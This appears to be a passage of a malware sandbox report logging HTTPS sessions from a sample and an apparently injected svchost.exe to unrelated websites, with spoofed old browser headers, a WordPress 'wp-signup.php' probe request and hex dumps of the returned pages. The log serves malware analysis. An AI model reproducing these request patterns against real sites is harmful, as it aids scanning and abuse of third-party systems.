                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1302INData Raw: 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 62 75 74 74 6f 6e 20 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 68 6f 6d 65 2f 63 61 6e 67 75 72 6f 2d 62 61 6a 61 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 63 61 70 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 6f 72 74 61
                                                                                                                                                                                                                                                                        Data Ascii: ><figure class="g-promoimage-effect"><span class="g-promoimage-iconbutton "></span><img src="/images/home/canguro-baja.jpg" alt=""><div class="g-promoimage-caption"><div class="g-promoimage-icon"></div><div class="g-promoimage-desc"><a class="porta
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1304INData Raw: 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 2d 38 31 32 34 22 20 63 6c 61 73 73 3d 22 67 2d 77 72 61 70 70 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 35 30 22 3e 0a 3c 66 6f 6f 74 65 72 20 69 64 3d 22 67 2d 66 6f 6f 74 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61
                                                                                                                                                                                                                                                                        Data Ascii: grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-container-8124" class="g-wrapper"><div class="g-container"> <div class="g-grid"><div class="g-block size-50"><footer id="g-footer"><div cla
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1306INData Raw: 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 50 72 6f 67 72 61 6d 61 20 43 61 6e 67 75 72 6f 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 36 20 45 78 74 2e 33 36 31 2d 33 36 34 20 2d 20 3c 62 72 3e 20 3c 73 74 72 6f 6e 67 3e 48 6f 72 61 72 69 6f 20 64 65 20 41 74 65 6e 63 69 c3 b3 6e 3a 20 44 65 20 4c 75 6e 65 73 20 61 20 56 69 65 72 6e 65 73 20 64 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 31 32 3a 30 30 20 6d 20 79 20 64 65 20 32 3a 30 30 20 70 2e 6d 2e 20 61 20 36 3a 30 30 20 70 2e 6d 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72
                                                                                                                                                                                                                                                                        Data Ascii: cin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</br><br></br><strong>Citas Programa Canguro: <p>6076430026 Ext.361-364 - <br> <strong>Horario de Atencin: De Lunes a Viernes de 7:00 a.m. a 12:00 m y de 2:00 p.m. a 6:00 p.m.</br><br></br><str
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1307INData Raw: 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 50 42 58 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 50 42 58 3a 20 2b 35 37 20 36 30 37 20 36 34
                                                                                                                                                                                                                                                                        Data Ascii: </div><div class="g-contact-item"><div class="g-contact-label">Nuevo Sotomayor</div> <div class="g-contact-text">Nuevo Sotomayor</div> </div><div class="g-contact-item"><div class="g-contact-label">PBX</div> <div class="g-contact-text">PBX: +57 607 64
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1308INData Raw: 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 22 22 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c 61 73 73 3d 22 67 2d 66 6f 6f 74 65 72 2d 6c 6f 67 6f 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 32 30 32 31 2f 49 63 6f 6e 74 65 63 5f 4c 6f 67 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 6f 74 6f 70 2d 36 38 34 36 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70
                                                                                                                                                                                                                                                                        Data Ascii: class="g-content g-particle"> <a href="/" title="" rel="home" class="g-footer-logo"><img src="/images/2021/Icontec_Logo.jpg" alt="Clinica San Luis" /></a></div></div><div class="g-block size-33-3"><div id="totop-6846-particle" class="g-content g-p
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1310INData Raw: 34 34 30 0d 0a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 70 69 6e 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 74 3b 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 20 72 69 67 68 74 3a 30 70 78 3b 20 7a 2d 69 6e 64 65 78 3a 39 39 39 39 39 39 39 39 39 39 39 39 3b 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 22 3e 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 4a 61 76 61 53
                                                                                                                                                                                                                                                                        Data Ascii: 440"text/javascript" src="/media/gantry5/assets/js/main.js"></script><p class="pin"><span style="font-size: 10pt;"><div style="position: fixed; bottom: 0px; right:0px; z-index:999999999999; display:block;"><script language="JavaScript" type="text/JavaS
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1311INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        76192.168.2.65700483.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1184OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: dataform.co.uk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1324INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                        Keep-Alive: timeout=2, max=92
                                                                                                                                                                                                                                                                        Content-Length: 48938
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                        X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:20 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1325INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1328INData Raw: 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 28 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 6e 2c 21 31 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 2c 21 31 29 29 3a 28 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 6e 29 2c 61 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 61 2e 72 65 61 64 79 53 74 61 74 65 26 26 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 29 29 2c 28 6e 3d 74 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63
                                                                                                                                                                                                                                                                        Data Ascii: eadyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).conc
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1336INData Raw: 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 31 34 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70 65
                                                                                                                                                                                                                                                                        Data Ascii: 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(14)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur='1.2s' repe
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1344INData Raw: 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 74 68 65 6d 65 70 75 6e 63 68 2e 72 65 76 6f 6c 75 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 34 2e 38 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 63 5f 61 64 64 5f 74 6f 5f 63 61 72 74 5f 70 61 72 61 6d 73 3d 7b 22 61 6a 61 78 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61
                                                                                                                                                                                                                                                                        Data Ascii: ipt' src='https://dataform.co.uk/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8'></script><script type='text/javascript'>//<![CDATA[var wc_add_to_cart_params={"ajax_url":"https:\/\/dataform.co.uk\/wp-admin\/a
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1352INData Raw: 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b
                                                                                                                                                                                                                                                                        Data Ascii: ps://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="76x76" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="120x120" href="https://dataform.co.uk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1360INData Raw: 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 34 30 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 70 72 69 63 69 6e 67 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 50 72 69 63 69 6e 67 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74
                                                                                                                                                                                                                                                                        Data Ascii: menu-item-object-page menu-item-54040"><a href='https://dataform.co.uk/pricing/' data-level='1'><span class="menu-item-text"><span class="menu-text">Pricing</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-it
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1368INData Raw: 72 6d 2d 37 5c 2f 76 31 22 7d 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 73 63 72 69 70 74 73 2e 6a 73 3f 76 65 72 3d 35 2e 31 2e 33 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 67 6f 5f 70 72 69 63 69 6e 67 2f 61
                                                                                                                                                                                                                                                                        Data Ascii: rm-7\/v1"}};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.3'></script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/go_pricing/a


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        77192.168.2.657009138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1184OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1185INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:19 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1185INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        78192.168.2.657017188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1185OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: hyab.se
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1219INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:19 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://hyab.com
                                                                                                                                                                                                                                                                        Cache-Control: max-age=600
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 07:06:19 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lzBYFLyEBWaU8lFN6D085O8zKxpAtHZRkndxBzS4A2RCY%2FzODZEOqTf5V7qmie18tSVu0kX3p8mVWdzhw4aqW5OnLXT%2F1i8ATwTUrgahqMW8qMnwosjf5UcQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a83c196d3a6a-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1220INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1220INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        79192.168.2.65701191.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1185OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:57 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
